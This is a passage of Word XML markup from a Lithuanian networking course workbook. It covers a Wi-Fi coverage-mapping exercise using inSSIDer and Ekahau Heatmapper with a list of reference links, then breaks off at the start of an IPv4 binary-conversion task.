        <w:t>(rekomenduojama pr. įranga: inSSIDer*.exe; Ekahau Heatmapper-Setup.exe)</w:t>
      </w:r>
      <w:r w:rsidR="00960128" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA7DE7B" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0EDEEF" w14:textId="60F364B2" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pasirinktu būdu pateikite 802.11 standarto ryšio aprėpties žemėlapį</w:t>
      </w:r>
      <w:r w:rsidR="00960128" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> planą. Pateikite d</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u galimus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>scenarij</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118B7741" w14:textId="559041B2" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Rezultat</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> su Chanel AUTO</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6AB8FA" w14:textId="32B100A7" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Rezultat</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>su Chanel – LAISVIAUSIAS</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4729C8" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PAVYZDYS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781ACB20" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02E62228" wp14:editId="3F2E167A">
            <wp:extent cx="5338482" cy="2877755"/>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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId164">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5338482" cy="2877755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF72ED" w14:textId="0187CB7F" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00A433BD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD2C7E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">av. </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ekahau Heatmapper programos rezultatas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B18C1F2" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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1FD51E35" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF4A10F" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45A39CA8" wp14:editId="6D8C9F8C">
            <wp:extent cx="5680710" cy="2854384"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5680710" cy="2854384"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD39311" w14:textId="12050C14" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00A433BD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD2C7E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. inSSIDer 2.0 programos vaizdas. Signalo stiprumo fiksavimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBDCC1E" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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5B4C65AD" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE58254" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC59A3F" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Get reliable WiFi at home without needing to be a WiFi expert. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metageek. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId166">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.metageek.com/products/rampart-home/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56BB3289" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Wi-Fi Heatmaps. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ekahau. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId167">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.ekahau.com/solutions/wi-fi-heatmaps/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="668E8ED4" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ekahau HeatMapper download. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">FDMlib. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId168">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://en.freedownloadmanager.org/Windows-PC/Ekahau-HeatMapper-FREE.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="060A4BC9" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">WiFi Analyzer downldoad. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId169">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/en-us/p/wifi-analyzer/9nblggh33n0n?activetab=pivot:overviewtab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="540A1FA8" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Wifi Analyzer download. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Google Play. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId170">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer&amp;hl=en_US&amp;gl=US</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="236D4E5E" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kapiswe, S. (2021, sausio 1). 7 Best WiFi Analyzer For Windows 10, 8 and 7. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tech4fresher. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId171">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://tech4fresher.com/best-wifi-analyzer-for-windows/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="336439ED" w14:textId="26BB3959" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9DF4A9" w14:textId="064D329C" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00683BC8"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8</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKAIČIAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="003B60A5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BFB4EA" w14:textId="0E3EADE1" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pakeiskite skaičius</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lentelėje </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>į dvejetainę formą. Prisiminkite, kad bitų eiliškumas skaičiuojamas iš dešinės į kairę ir skaičius 2 keliamas laipsniu, kuris yra bito eilės numeris. Bitų eilė pakėlus laipsniu yra 128, 64, 32, 16, 8, 4, 2, ir 1.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="2929" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="79" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
